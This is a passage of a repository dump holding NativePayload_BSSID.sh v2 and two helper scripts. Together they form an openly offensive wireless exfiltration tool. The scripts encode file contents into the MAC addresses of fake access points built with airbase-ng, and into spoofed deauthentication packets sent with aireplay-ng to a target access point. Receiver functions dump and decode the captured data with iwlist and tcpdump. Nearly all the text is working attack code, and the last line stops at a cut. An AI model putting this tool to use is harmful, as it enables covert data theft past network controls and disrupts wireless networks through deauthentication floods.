https://www.peerlyst.com/posts/transferring-backdoor-payloads-with-bssid-by-wireless-traffic-damon-mohammadbagher 8 | 9 | -------------------------------------------------------------------------------- /EBOOK/Server_GetData_via_BSSID.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | fold -w37 $1 > AP_Info_list.txt; 3 | awk {'print $5'} AP_Info_list.txt > BSSID_List.txt; 4 | 5 | for ops in `awk '!a[$0]++' BSSID_List.txt | xxd -p`; 6 | do 7 | ops1=`echo $ops | xxd -r -p` 8 | ops2=`echo $ops | xxd -r -p | xxd -r -p` 9 | echo $ops1 "==>" $ops2 10 | done 11 | echo 12 | echo "[;)] your Injected Bytes via Mac Addresses: " 13 | echo `awk '!a[$0]++' BSSID_List.txt` 14 | echo 15 | echo "[;o] your Data : " 16 | echo 17 | echo `awk '!a[$0]++' BSSID_List.txt | xxd -r -p` 18 | -------------------------------------------------------------------------------- /EBOOK/Server_iwlist_Scan.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | x=1 3 | while [ $x -le $1 ] 4 | do 5 | echo $x 6 | ((x++)) 7 | echo `iwlist 'wlan0' 'scan' | grep -e "Address: 00:"` >> $2 ; 8 | echo "iwlist AP List Dumped to file" $2; 9 | sleep 6 ; 10 | done 11 | fold -w37 $2 > output.txt ; 12 | echo "AP List saved in Output.txt file" 13 | echo 14 | cat output.txt 15 | # echo `awk '!a[$0]++' output.txt` 16 | 17 | -------------------------------------------------------------------------------- /NativePayload_BSSID v2/NativePayload_BSSID.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | echo 3 | echo "NativePayload_BSSID.sh v2 , Published by Damon Mohammadbagher 2017-2019" 4 | echo "Injecting/Downloading/Uploading DATA via BSSID (Wireless Traffic)" 5 | echo "help syntax: ./NativePayload_BSSID.sh help" 6 | echo 7 | 8 | function _help () 9 | { 10 | tput setaf 2 11 | echo 12 | echo "[@]:NativePayload_BSSID.sh $(tput setaf 11)v2$(tput setaf 2) , Published by $(tput setaf 3)Damon Mohammadbagher 2017-2019$(tput setaf 2)" 13 | echo "[@]:NativePayload_BSSID.sh (Internal.Commands):" 14 | echo 15 | tput setaf 10 16 | echo "[@]:Client/Server Side (Internal.Commands):" 17 | echo 18 | tput setaf 2 19 | printf '\u2507'; echo "$(tput setaf 11) @help $(tput setaf 2) => show all internal Commands" 20 | printf '\u2523\u2509'; echo "Description: Help for commands" 21 | printf '\u2516\u2509'; echo "Example:#@help" 22 | echo 23 | printf '\u2507'; echo "$(tput setaf 11) @exit $(tput setaf 2) => exit" 24 | printf '\u2523\u2509'; echo "Description: exit to Console" 25 | printf '\u2516\u2509'; echo "Example:#@exit" 26 | echo 27 | printf '\u2507'; echo "$(tput setaf 11) @clientmode $(tput setaf 2) or $(tput setaf 11) @cli $(tput setaf 2) => switch to client mode" 28 | printf '\u2523\u2509'; echo "Description: switch to client mode" 29 | printf '\u2523\u2509'; echo "Example:#@clientmode" 30 | printf '\u2516\u2509'; echo "Example:#@cli" 31 | echo 32 | printf '\u2507'; echo "$(tput setaf 11) @servermode $(tput setaf 2) or $(tput setaf 11) @serv $(tput setaf 2) => switch to server mode" 33 | printf '\u2523\u2509'; echo "Description: switch to server mode" 34 | printf '\u2523\u2509'; echo "Example:#@servermode" 35 | printf '\u2516\u2509'; echo "Example:#@serv" 36 | echo 37 | printf '\u2507'; echo "$(tput setaf 11) @clear $(tput setaf 2) => Console clear" 38 | printf '\u2523\u2509'; echo "Description: Console clear" 39 | printf '\u2516\u2509'; echo "Example:#@clear" 40 | echo 41 | printf '\u2507'; echo "$(tput setaf 11) @dbgon $(tput setaf 2) => show details : enable" 42 | printf '\u2523\u2509'; echo "Description: show all details" 43 | printf '\u2516\u2509'; echo "Example:#@dbgon" 44 | echo 45 | printf '\u2507'; echo "$(tput setaf 11) @dbgoff $(tput setaf 2) => show details : disable" 46 | printf '\u2523\u2509'; echo "Description: Disabling details (default)" 47 | printf '\u2516\u2509'; echo "Example:#@dbgoff" 48 | echo 49 | tput setaf 10 50 | echo "[@]:Server Side (only) (Internal.Commands):" 51 | echo 52 | tput setaf 2 53 | printf '\u2507'; echo "$(tput setaf 11) @bssid $(tput setaf 2) or $(tput setaf 11) bssid $(tput setaf 2) => Scanning BSSID via Iwlist (server-side) $(tput setaf 3)(Old v1 / slow)$(tput setaf 2)" 54 | printf '\u2523\u2509'; echo "Description: Scanning BSSID on AIR via Iwlist tool to dump Exfil/Text/Data from (client-side) (default)" 55 | printf '\u2523\u2509'; echo "Example:#@bssid" 56 | printf '\u2516\u2509'; echo "Example:#bssid" 57 | echo 58 | printf '\u2507'; echo "$(tput setaf 11) @deauth $(tput setaf 2) or $(tput setaf 11) deauth $(tput setaf 2) => Attack.(Deauth) Packet Monitoring for Fake AP (server-side) $(tput setaf 3)(New v2 / very fast)$(tput setaf 2)" 59 | printf '\u2523\u2509'; echo "Description: Monitoring WlanMon interface (Monitor-Interface) to Detect Recevied Payload via Deauth Attack Packets from Clients" 60 | printf '\u2523\u2509'; echo "Example:#@deauth" 61 | printf '\u2516\u2509'; echo "Example:#deauth" 62 | echo 63 | printf '\u2507'; echo "$(tput setaf 11) @run $(tput setaf 2) => running server side Methods [BSSID or DeAuth]" 64 | printf '\u2523\u2509'; echo "Description: running server side Methods [BSSID or DeAuth]" 65 | printf '\u2516\u2509'; echo "Example:#@run" 66 | 67 | } 68 | function killairbase 69 | { 70 | 71 | sleep 10 ; 72 | echo 73 | killall airbase-ng ; 74 | 75 | } 76 | 77 | ################################################## version 1 ################################################## 78 | ################################################## send_Bssids v1 ################################################# 79 | # ./NativePayload_BSSID.sh -f mytext.txt Fake wlan1mon0 80 | # making fake mode (send_Bssids) 81 | if [ $1 == "-f" ] 82 | then 83 | for bytes in `xxd -p -c 5 $2 | sed 's/../&:/g'`; 84 | do 85 | tput setaf 6; 86 | Exfil="${bytes::-1}" 87 | text=`echo $Exfil | xxd -r -p` 88 | Time=`date '+%d/%m/%Y %H:%M:%S'` 89 | echo "[!]:[$Time] Injecting text: "\"$text\" "to Mac via BSSID" "[00:$Exfil]" "for FAKE AccessPoint: " $3 90 | sleep 0.3 91 | tput setaf 9; 92 | # Making Fake AP via airbase and Injecting Payloads to BSSIDs (MAC Address) 93 | killairbase | airbase-ng -a 00:$Exfil --essid $3 -I 10 -0 $4 | grep started 94 | 95 | done 96 | Time=`date '+%d/%m/%Y %H:%M:%S'` 97 | tput setaf 6; 98 | echo "[>]:[$Time] Setting Finish Flag [00:ff:00:ff:00:ff] to BSSID..." 99 | sleep 0.3 100 | tput setaf 9; 101 | killairbase | airbase-ng -a 00:ff:00:ff:00:ff --essid $3 -I 10 -0 $4 | grep started 102 | fi 103 | ################################################## send_Bssids v1 ##################################### 104 | ################################################## receive_Bssids v1 ##################################### 105 | # ./NativePayload_BSSID.sh -s wlan0 myExfildump.txt 106 | # starting scan mode (dump_Bssids) 107 | if [ $1 == "-s" ] 108 | then 109 | echo "Scanning Mode by \"Iwlist\" tool Started." 110 | echo "" > $3 111 | while true 112 | do 113 | # echo `iwlist 'wlan0' 'scan' | grep -e "Address: 00:"` >> $2 ; 114 | echo `iwlist $2 'scan' | grep -e "Address: 00:"` >> $3 ; 115 | tput setaf 9; 116 | Time=`date '+%d/%m/%Y %H:%M:%S'` 117 | echo "[!]:[$Time] iwlist AP list Dumped to file: " $3; 118 | sleep 4.2 ; 119 | FinishFlag=`cat $3 | grep -e 00:ff:00:ff:00:ff -e 00:FF:00:FF:00:FF` 120 | if (( `echo ${#FinishFlag}` !=0 )) 121 | then 122 | Time=`date '+%d/%m/%Y %H:%M:%S'` 123 | sleep 0.3 124 | tput setaf 7; 125 | echo "[!]:[$Time] Finish flag BSSID Address Detected :" 00:ff:00:ff:00:ff 126 | break 127 | fi 128 | done 129 | tput setaf 9; 130 | # fold -w37 $3 > output.txt ; 131 | Time=`date '+%d/%m/%Y %H:%M:%S'` 132 | echo "[>] [$Time] AP List saved to" \"temp.txt\" "file" 133 | echo 134 | 135 | # DEBUG 136 | # cat output.txt 137 | fold -w37 $3 > temp.txt; 138 | awk {'print $5'} temp.txt > temp2Awk.txt; 139 | # using '!a[$0]++' is not good idea ;) sometimes.... . 140 | for ops in `awk '!a[$0]++' temp2Awk.txt | xxd -p`; 141 | do 142 | ops1=`echo $ops | xxd -r -p` 143 | ops2=`echo $ops | xxd -r -p | xxd -r -p` 144 | echo $ops1 "==>" $ops2 145 | done 146 | echo 147 | echo "[!] your Injected Bytes via BSSID Addresses: " 148 | echo 149 | echo `awk '!a[$0]++' temp2Awk.txt` 150 | echo 151 | echo "[!] your Text/Data: " 152 | echo 153 | ExfilString=`cat temp2Awk.txt | awk '!a[$0]++'` 154 | echo "${ExfilString::-17}" | xxd -r -p 155 | Timestr=`date '+%d-%m-%Y.%H-%M-%S'` 156 | echo " " > ExfilOutput_$Timestr.txt 157 | echo 158 | echo "[>] your Text/Data saved to" \"ExfilOutput_$Timestr.txt\" "file" 159 | str=`echo "${ExfilString::-17}" | xxd -r -p` 160 | echo $str > ExfilOutput_$Timestr.txt 161 | fi 162 | ################################################## receive_Bssids v1 ##################################### 163 | ################################################## version 1 ################################################## 164 | 165 | ################################################################################################################### 166 | ################################################################################################################### 167 | ################################################################################################################### 168 | 169 | ################################################## version 2 ################################################## 170 | ################################################## send_Bssids v2 ############################### 171 | function sendBssids 172 | { 173 | tput setaf 6; 174 | Time=`date '+%d/%m/%Y %H:%M:%S'` 175 | echo "[>]:[$Time] Exfiltration.via.BSSID:Started" 176 | 177 | for bytes in `echo "$1" | xxd -p -c 5 | sed 's/../&:/g'`; 178 | do 179 | 180 | Exfil="${bytes::-1}" 181 | text=`echo $Exfil | xxd -r -p` 182 | Time=`date '+%d/%m/%Y %H:%M:%S'` 183 | if [ "$4" == "true" ] 184 | then 185 | tput setaf 10; 186 | echo "[!]:[$Time] Injecting text: "\"$text\" "to Mac via BSSID" "[00:$Exfil]" "for FAKE AccessPoint: " $2 187 | else 188 | tput setaf 6; 189 | printf "." 190 | fi 191 | sleep 10 192 | tput setaf 9; 193 | tempaddress=`echo "00:$Exfil:20:20:20:20:20:20" | head -c17` 194 | killairbase | nohup airbase-ng -a $tempaddress --essid $2 -I 10 -0 $3 > "airbase_output.txt" 2>&1 & 195 | done 196 | 197 | if [ "$4" == "false" ] 198 | then 199 | echo " " 200 | fi 201 | tput setaf 10; 202 | Time=`date '+%d/%m/%Y %H:%M:%S'` 203 | echo "[>]:[$Time] Setting Finish Flag [00:ff:00:ff:00:ff] to BSSID..." 204 | sleep 10 205 | 206 | killairbase | nohup airbase-ng -a 00:ff:00:ff:00:ff --essid $2 -I 10 -0 $3 > "airbase_output.txt" 2>&1 & 207 | Time=`date '+%d/%m/%Y %H:%M:%S'` 208 | tput setaf 6; 209 | echo "[>]:[$Time] Exfiltration.via.BSSID:Done" 210 | tput setaf 2; 211 | } 212 | ################################################## send_Bssids v2 ############################### 213 | 214 | ################################################## receive_Bssids v2 ############################ 215 | function receiveBssids 216 | { 217 | # ./NativePayload_BSSID.sh -s wlan0 myExfildump.txt 218 | # receiveBssids "wlan0" "myExfildump.txt" "false" 219 | #echo "Scanning Mode by \"Iwlist\" tool Started." 220 | Time=`date '+%d/%m/%Y %H:%M:%S'` 221 | tput setaf 6; 222 | echo "[>]:[$Time]:Iwlist.AP.Scanning.via.[$1]:Started" 223 | echo "" > $2 224 | while true 225 | do 226 | # echo `iwlist 'wlan0' 'scan' | grep -e "Address: 00:"` >> $2 ; 227 | echo `iwlist $1 'scan' | grep -e "Address: 00:"` >> $2 ; 228 | if [ "$3" == "true" ] 229 | then 230 | tput setaf 10; 231 | Time=`date '+%d/%m/%Y %H:%M:%S'` 232 | echo "[!]:[$Time]:Iwlist.APlist.Saving.[$2]:Done"; 233 | else 234 | printf "." 235 | fi 236 | 237 | sleep 4.2 ; 238 | 239 | FinishFlag=`strings "$2" | grep -e 00:ff:00:ff:00:ff -e 00:FF:00:FF:00:FF` 240 | if (( `echo ${#FinishFlag}` !=0 )) 241 | then 242 | if [ "$3" == "false" ] 243 | then 244 | echo 245 | fi 246 | sleep 0.3 247 | tput setaf 6; 248 | Time=`date '+%d/%m/%Y %H:%M:%S'` 249 | echo "[!]:[$Time]:Finish.flag.BSSID.[00:ff:00:ff:00:ff]:Detected" 250 | break 251 | fi 252 | done 253 | 254 | tput setaf 6; 255 | Time=`date '+%d/%m/%Y %H:%M:%S'` 256 | echo "[>]:[$Time]:Iwlist.APlist.Saving.[temp.txt]:Done"; 257 | 258 | # DEBUG 259 | # cat output.txt 260 | tput setaf 10; 261 | fold -w37 $2 > temp.txt; 262 | awk {'print $5'} temp.txt | sed 's/00:ff:00:ff:00:ff//g' | sed 's/00:FF:00:FF:00:FF//g' | sed 's/00://g' > temp2Awk.txt; 263 | 264 | tput setaf 2; 265 | Time=`date '+%d/%m/%Y %H:%M:%S'` 266 | printf "[!]:[$Time]:Injected.Bytes.[BSSID]:" 267 | echo `awk '!a[$0]++' temp2Awk.txt` 268 | ExfilString=`strings temp2Awk.txt | sed 's/00:ff:00:ff:00:ff//g' | sed 's/00:FF:00:FF:00:FF//g'| awk '!a[$0]++' | xxd -r -p` 269 | tput setaf 10; 270 | echo "[!]:[$Time]:Dumped.[Text/Data]:$(tput setaf 11) $ExfilString" 271 | Timestr=`date '+%d-%m-%Y.%H-%M-%S'` 272 | echo " " > "ExfilOutput_$Timestr.txt" 273 | str=`echo "$ExfilString" | xxd -r -p` 274 | echo $str > ExfilOutput_$Timestr.txt 275 | Time=`date '+%d/%m/%Y %H:%M:%S'` 276 | tput setaf 10; 277 | echo "[>]:[$Time]:Text.saved.[ExfilOutput_$Timestr.txt]:Done" 278 | tput setaf 2; 279 | } 280 | ################################################## receive_Bssids v2 ############################ 281 | 282 | ########################################### ExfilDeauth v2 (send) ############################### 283 | # ExfilDeauth "up.txt" "00:11:22:33:44:55" "wlan0" "1" 284 | # ExfilDeauth "local text file" "target AP/Fake AP BSSID" "local Wlan" "local wlan channel" 285 | function ExfilDeauth 286 | { 287 | Time=`date '+%d/%m/%Y %H:%M:%S'` 288 | tput setaf 6; 289 | echo "[>]:[$Time]:Exfiltration via Deauthentication Packets:Started" 290 | tput setaf 2; 291 | echo "[>]:[$Time]:Sending Deauthentication Packets via $3 by channel $4 to Default Target AP:Started" 292 | echo "[>]:[$Time]:Sending Deauthentication Packets to Target AP.BSSID.[00:11:22:33:44:55]:Started" 293 | 294 | `iwconfig $3 channel $4` 295 | Random1=`head /dev/urandom | tr -dc 0-2 | head -c1` 296 | id="0" 297 | 298 | for bytes in `echo "$1" | xxd -p -c 5 | sed 's/../&:/g'`; 299 | do 300 | tput setaf 2; 301 | Exfil="${bytes::-1}" 302 | text=`echo "$Exfil:20:20:20:20:20:20" | head -c17 | xxd -r -p` 303 | Time=`date '+%d/%m/%Y %H:%M:%S'` 304 | 305 | if [ "$id" == "0" ] ; 306 | then 307 | Random1="0" 308 | id="1" 309 | elif [ "$id" == "1" ] ; 310 | then 311 | Random1="1" 312 | id="2" 313 | elif [ "$id" == "2" ] ; 314 | then 315 | Random1="2" 316 | id="3" 317 | elif [ "$id" == "3" ] ; 318 | then 319 | Random1="3" 320 | id="4" 321 | elif [ "$id" == "4" ] ; 322 | then 323 | Random1="4" 324 | id="5" 325 | elif [ "$id" == "5" ] ; 326 | then 327 | Random1="5" 328 | id="6" 329 | elif [ "$id" == "6" ] ; 330 | then 331 | Random1="6" 332 | id="7" 333 | elif [ "$id" == "7" ] ; 334 | then 335 | Random1="7" 336 | id="8" 337 | elif [ "$id" == "8" ] ; 338 | then 339 | Random1="8" 340 | id="9" 341 | elif [ "$id" == "9" ] ; 342 | then 343 | Random1="9" 344 | id="a" 345 | elif [ "$id" == "a" ] ; 346 | then 347 | Random1="a" 348 | id="b" 349 | elif [ "$id" == "b" ] ; 350 | then 351 | Random1="b" 352 | id="c" 353 | elif [ "$id" == "c" ] ; 354 | then 355 | Random1="c" 356 | id="d" 357 | elif [ "$id" == "d" ] ; 358 | then 359 | Random1="d" 360 | id="e" 361 | elif [ "$id" == "e" ] ; 362 | then 363 | Random1="e" 364 | id="f" 365 | elif [ "$id" == "f" ] ; 366 | then 367 | Random1="f" 368 | id="0" 369 | fi 370 | 371 | tempaddress=`echo "0$Random1:$Exfil:20:20:20:20:20:20" | head -c17` 372 | sleep 0.2 373 | 374 | if [ "$5" == "true" ] 375 | then 376 | tput setaf 10; 377 | Time=`date '+%d/%m/%Y %H:%M:%S'` 378 | echo "[!]:[$Time]:Injecting text: "\"$text\" "to Deauthentication Packet via" "[$tempaddress]" "for FAKE AccessPoint: " $2 379 | aireplay-ng -0 1 -a "$2" -c "$tempaddress" "$3" | grep "Sending" & 380 | else 381 | printf "." 382 | tput setaf 10; 383 | aireplay-ng -0 1 -a "$2" -c "$tempaddress" "$3" | grep "error ;)" & 384 | fi 385 | 386 | done 387 | 388 | if [ "$5" == "false" ] 389 | then 390 | echo " " 391 | fi 392 | sleep 0.1 393 | Time=`date '+%d/%m/%Y %H:%M:%S'` 394 | echo "[>]:[$Time]:Sending Finish Flag [00:ff:00:ff:00:ff] to target AccessPoint: $2" 395 | aireplay-ng -0 3 -a "$2" -c "00:ff:00:ff:00:ff" "$3" | grep "error ;)" & 396 | wait; 397 | Time=`date '+%d/%m/%Y %H:%M:%S'` 398 | tput setaf 6; 399 | echo "[!]:[$Time]:Exfiltration via Deauthentication Packets:Done" 400 | 401 | } 402 | ########################################### ExfilDeauth v2 (send) ############################### 403 | 404 | 405 | ########################################### ExfilDeauth v2 (receive) ############################ 406 | # ExfilDeauthDumps -dumpdeauth wlan1mon "1" 407 | # ExfilDeauthDumps "essid-fakev2" wlan1mon channel true 408 | function ExfilDeauthDumps 409 | { 410 | 411 | tput setaf 2; 412 | FakeAp="$1" 413 | 414 | if [ "$1" == "" ] 415 | then 416 | FakeAp="fakev2"; 417 | fi 418 | 419 | Time=`date '+%d/%m/%Y %H:%M:%S'` 420 | echo "[>]:[$Time]:Default AP.BSSID.[00:11:22:33:44:55]:Created" 421 | nohup airbase-ng -a 00:11:22:33:44:55 --essid "$FakeAp" -I 10 -0 "$2" -c "$3" > "airbase_output.txt" 2>&1 & 422 | Time=`date '+%d/%m/%Y %H:%M:%S'` 423 | tput setaf 10; 424 | echo "[>]:[$Time]:Default AP.ESSID.[$FakeAp] with Wifi Channel.[$3] via $2:Started" 425 | tput setaf 2; 426 | sleep 1.5 427 | `nohup tcpdump -i "$2" -n | grep "DeAuthentication" > "DeauthPayloadDumps.txt" 2>&1 &` 428 | sleep 1 429 | Time=`date '+%d/%m/%Y %H:%M:%S'` 430 | echo "[>]:[$Time]:$2 Packet Monitoring for DeAuthentication Traffic:Started" 431 | while true 432 | do 433 | if [ "$4" == "true" ] 434 | then 435 | printf '.' 436 | fi 437 | FinishFlag=`strings "DeauthPayloadDumps.txt" | grep "00:ff:00:ff:00:ff"` 438 | if (( `echo ${#FinishFlag}` !=0 )) 439 | then 440 | tput setaf 6; 441 | Time=`date '+%d/%m/%Y %H:%M:%S'` 442 | if [ "$4" == "true" ] 443 | then 444 | echo "" 445 | fi 446 | echo "[!]:[$Time]:Finish Flag:Detected" 447 | break; 448 | fi 449 | sleep 3.5 450 | done 451 | `strings "DeauthPayloadDumps.txt" | awk {'print $12'} | awk '!a[$0]++' | sed "s/00:11:22:33:44:55//g" | sed 's/00:ff:00:ff:00:ff//g' | sed 's/00:FF:00:FF:00:FF//g' | sed 's/00:11:22:33:44:55//g' | sed 's/00://g' | sed 's/01://g' | sed 's/02://g' | sed 's/03://g' | sed 's/04://g' | sed 's/05://g' | sed 's/06://g' | sed 's/07://g' | sed 's/08://g' | sed 's/09://g' | sed 's/0a://g' | sed 's/0b://g' | sed 's/0c://g' | sed 's/0d://g' | sed 's/0e://g' | sed 's/0f://g' | xxd -r -p > "DeAuthbytes.txt" ` 452 | payload=`cat DeAuthbytes.txt` 453 | Time=`date '+%d/%m/%Y %H:%M:%S'` 454 | tput setaf 6; 455 | echo "[!]:[$Time]:Payload Dumping:Done" 456 | tput setaf 10; 457 | echo "[!]:[$Time]:Text/Data Dumped:$(tput setaf 11) $payload" 458 | nohup killall airbase-ng > "kill.txt" 2>&1 & 459 | nohup killall tcpdump > "kill.txt" 2>&1 & 460 | tput setaf 10; 461 | Timestr=`date '+%d-%m-%Y.%H-%M-%S'` 462 | echo " " > "ExfilOutput_$Timestr.txt" 463 | echo $payload > "ExfilOutput_$Timestr.txt" 464 | echo "[>]:[$Time]:Text/Data saved to \"ExfilOutput_$Timestr.txt\"" 465 | tput setaf 2; 466 | } 467 | ########################################### ExfilDeauth v2 (receive) ############################ 468 | 469 | ############################### ExfilDeauth v2 (Command-based send) ############################### 470 | # ./NativePayload_BSSID.sh -exfildeauth text.txt "bssid" wlan1 "7" 471 | # ./NativePayload_BSSID.sh -exfildeauth text.txt "00:11:22:33:44:55" wlan1 "7" "dbg" 472 | if [ $1 == "-exfildeauth" ]; 473 | then 474 | `iwconfig $4 channel $5` 475 | Random1=`head /dev/urandom | tr -dc 0-2 | head -c1` 476 | id="0" 477 | 478 | for bytes in `strings $2 | xxd -p -c 5 | sed 's/../&:/g'`; 479 | do 480 | tput setaf 2; 481 | Exfil="${bytes::-1}" 482 | text=`echo $Exfil | xxd -r -p` 483 | 484 | tput setaf 10; 485 | 486 | if [ "$id" == "0" ] ; 487 | then 488 | Random1="0" 489 | id="1" 490 | elif [ "$id" == "1" ] ; 491 | then 492 | Random1="1" 493 | id="2" 494 | elif [ "$id" == "2" ] ; 495 | then 496 | Random1="2" 497 | id="3" 498 | elif [ "$id" == "3" ] ; 499 | then 500 | Random1="3" 501 | id="4" 502 | elif [ "$id" == "4" ] ; 503 | then 504 | Random1="4" 505 | id="5" 506 | elif [ "$id" == "5" ] ; 507 | then 508 | Random1="5" 509 | id="6" 510 | elif [ "$id" == "6" ] ; 511 | then 512 | Random1="6" 513 | id="7" 514 | elif [ "$id" == "7" ] ; 515 | then 516 | Random1="7" 517 | id="8" 518 | elif [ "$id" == "8" ] ; 519 | then 520 | Random1="8" 521 | id="9" 522 | elif [ "$id" == "9" ] ; 523 | then 524 | Random1="9" 525 | id="a" 526 | elif [ "$id" == "a" ] ; 527 | then 528 | Random1="a" 529 | id="b" 530 | elif [ "$id" == "b" ] ; 531 | then 532 | Random1="b" 533 | id="c" 534 | elif [ "$id" == "c" ] ; 535 | then 536 | Random1="c" 537 | id="d" 538 | elif [ "$id" == "d" ] ; 539 | then 540 | Random1="d" 541 | id="e" 542 | elif [ "$id" == "e" ] ; 543 | then 544 | Random1="e" 545 | id="f" 546 | elif [ "$id" == "f" ] ; 547 | then 548 | Random1="f" 549 | id="0" 550 | fi 551 | #sleep 0.1 552 | tempaddress=`echo "0$Random1:$Exfil:20:20:20:20:20:20" | head -c17` 553 | sleep 0.2 554 | if [ "$6" == "fast" ] ; 555 | then 556 | echo "$(tput setaf 2)[!]:Sending [$(tput setaf 11)"$text"$(tput setaf 2)] via DeAuth.Cli.BSSID.[$(tput setaf 3)$tempaddress$(tput setaf 2)]" "to Target AP.[$(tput setaf 3)"$3"$(tput setaf 2)]$(tput setaf 10) Done." 557 | aireplay-ng -0 1 -a "$3" -c $tempaddress "$4" & 558 | sleep 0.2 559 | elif [ "$6" == "faster" ] ; 560 | then 561 | echo "$(tput setaf 2)[!]:Sending [$(tput setaf 11)"$text"$(tput setaf 2)] via DeAuth.Cli.BSSID.[$(tput setaf 3)$tempaddress$(tput setaf 2)]" "to Target AP.[$(tput setaf 3)"$3"$(tput setaf 2)]$(tput setaf 10) Done." 562 | aireplay-ng -0 1 -a "$3" -c $tempaddress "$4" & 563 | 564 | #if [ "$id" == "f" ]; 565 | #then 566 | #sleep 1.5 567 | #fi 568 | else 569 | Time=`date '+%d/%m/%Y %H:%M:%S'` 570 | echo "$(tput setaf 2)[!]:[$Time] Sending [$(tput setaf 11)"$text"$(tput setaf 2)] via DeAuth.Cli.BSSID.[$(tput setaf 3)$tempaddress$(tput setaf 2)]" "to Target AP.[$(tput setaf 3)"$3"$(tput setaf 2)]$(tput setaf 10) Done." 571 | sleep 0.2 572 | out=`aireplay-ng -0 1 -a "$3" -c $tempaddress "$4" | grep "Sending"` 573 | if [ "$6" == "dbg" ] ; 574 | then 575 | echo "$(tput setaf 14)$out" 576 | fi 577 | fi 578 | 579 | done 580 | 581 | tput setaf 6; 582 | Time=`date '+%d/%m/%Y %H:%M:%S'` 583 | echo "[>]:[$Time] Sending Finish Flag [00:ff:00:ff:00:ff] to AccessPoint: $3" 584 | aireplay-ng -0 1 -a "$3" -c "00:ff:00:ff:00:ff" "$4" | grep "error ;)" 585 | Time=`date '+%d/%m/%Y %H:%M:%S'` 586 | echo "[>]:[$Time] Exfiltration via Deauthentication Packets Done." 587 | fi 588 | ############################### ExfilDeauth v2 (Command-based send) ############################### 589 | 590 | ############################### ExfilDeauth v2 (Command-based receive) ############################### 591 | # ExfilDeauthDumps_CmdBased "fakev2" wlan1mon channel BSSID-optional 592 | function ExfilDeauthDumps_CmdBased 593 | { 594 | nohup killall airbase-ng > "kill.txt" 2>&1 & 595 | nohup killall tcpdump > "kill.txt" 2>&1 & 596 | tput setaf 2; 597 | FakeAp="$1"; 598 | defaultBSSID="$4" 599 | if [[ "$1" == "" || "$1" == " " ]] 600 | then 601 | FakeAp="DefaultFakeAP"; 602 | fi 603 | if [ "$4" == "" ] 604 | then 605 | defaultBSSID="00:11:22:33:44:55" 606 | fi 607 | 608 | Time=`date '+%d/%m/%Y %H:%M:%S'` 609 | echo "$(tput setaf 2)[>]:[$Time]:Default AP.BSSID.[$(tput setaf 3)$defaultBSSID$(tput setaf 2)]:$(tput setaf 10)Created$(tput setaf 2)" 610 | nohup airbase-ng -a "$defaultBSSID" --essid "$FakeAp" -I 10 -0 "$2" -c "$3" > "airbase_output.txt" 2>&1 & 611 | Time=`date '+%d/%m/%Y %H:%M:%S'` 612 | echo "$(tput setaf 2)[>]:[$Time]:Default AP.ESSID.[$(tput setaf 3)$FakeAp$(tput setaf 2)] with Wifi Channel.[$(tput setaf 3)$3$(tput setaf 2)] via Interface.[$(tput setaf 3)$2$(tput setaf 2)]:$(tput setaf 10)Started$(tput setaf 2)" 613 | tput setaf 10; 614 | sleep 1.5 615 | out=`nohup tcpdump -i "$2" -n | grep "DeAuthentication" > "DeauthPayloadDumps.txt" &` 616 | sleep 1 617 | counter=0 618 | while true 619 | do 620 | Time=`date '+%d/%m/%Y %H:%M:%S'` 621 | echo "$(tput setaf 2)[>]:[$Time]:$(tput setaf 3)$2$(tput setaf 2) Packet Monitoring for DeAuthentication Traffic:$(tput setaf 10)Started$(tput setaf 2)" 622 | printf "[>]:[$Time]:$(tput setaf 3)$2$(tput setaf 2) Packet Monitoring " 623 | while true 624 | do 625 | tput setaf 3; 626 | if (( $counter > 3 )) 627 | then 628 | printf '.' 629 | counter=0 630 | fi 631 | tput setaf 2; 632 | FinishFlag=`strings "DeauthPayloadDumps.txt" | grep "00:ff:00:ff:00:ff"` 633 | if (( `echo ${#FinishFlag}` !=0 )) 634 | then 635 | tput setaf 10; 636 | Time=`date '+%d/%m/%Y %H:%M:%S'` 637 | echo "" 638 | echo "$(tput setaf 2)[!]:[$Time]:Finish Flag:$(tput setaf 10)Detected$(tput setaf 2)" 639 | break; 640 | fi 641 | ((counter++)) 642 | sleep 3.5 643 | done 644 | # `strings "DeauthPayloadDumps.txt" | awk {'print $12'} | awk '!a[$0]++' | sed 's/00:ff:00:ff:00:ff//g' | sed 's/00:FF:00:FF:00:FF//g' | sed 's/00:11:22:33:44:55//g' | sed 's/00://g' | sed 's/01://g' | sed 's/02://g' | sed 's/03://g' | sed 's/04://g' | sed 's/05://g' | sed 's/06://g' | sed 's/07://g' | sed 's/08://g' | sed 's/09://g' | sed 's/0a://g' | sed 's/0b://g' | sed 's/0c://g' | sed 's/0d://g' | sed 's/0e://g' | sed 's/0f://g' > "DeAuthbytes1.txt" ` 645 | `strings "DeauthPayloadDumps.txt" | awk {'print $12'} | awk '!a[$0]++' | sed "s/$defaultBSSID//g" | sed 's/00:ff:00:ff:00:ff//g' | sed 's/00:FF:00:FF:00:FF//g' | sed 's/00:11:22:33:44:55//g' | sed 's/00://g' | sed 's/01://g' | sed 's/02://g' | sed 's/03://g' | sed 's/04://g' | sed 's/05://g' | sed 's/06://g' | sed 's/07://g' | sed 's/08://g' | sed 's/09://g' | sed 's/0a://g' | sed 's/0b://g' | sed 's/0c://g' | sed 's/0d://g' | sed 's/0e://g' | sed 's/0f://g' | xxd -r -p > "DeAuthbytes.txt" ` 646 | payload=`cat DeAuthbytes.txt` 647 | Time=`date '+%d/%m/%Y %H:%M:%S'` 648 | echo "$(tput setaf 2)[!]:[$Time]:Payload Dumping:$(tput setaf 10)Done$(tput setaf 2)." 649 | echo "$(tput setaf 2)[!]:[$Time]:Text/Data Dumped:$(tput setaf 11) $payload$(tput setaf 2)" 650 | nohup killall tcpdump > "kill.txt" 2>&1 & 651 | Timestr=`date '+%d-%m-%Y.%H-%M-%S'` 652 | echo " " > "ExfilOutput_$Timestr.txt" 653 | echo $payload > "ExfilOutput_$Timestr.txt" 654 | echo "$(tput setaf 2)[>]:[$Time]:Text/Data Saved to $(tput setaf 10)\"ExfilOutput_$Timestr.txt\"$(tput setaf 2)" 655 | tput setaf 2; 656 | sleep 0.5; 657 | echo "" > "DeauthPayloadDumps.txt" 658 | sleep 0.5; 659 | tput setaf 10; 660 | `nohup tcpdump -i "$2" -n | grep "DeAuthentication" > "DeauthPayloadDumps.txt" 2>&1 & ` 661 | done 662 | } 663 | ############################### ExfilDeauth v2 (Command-based receive) ############################### 664 | 665 | if 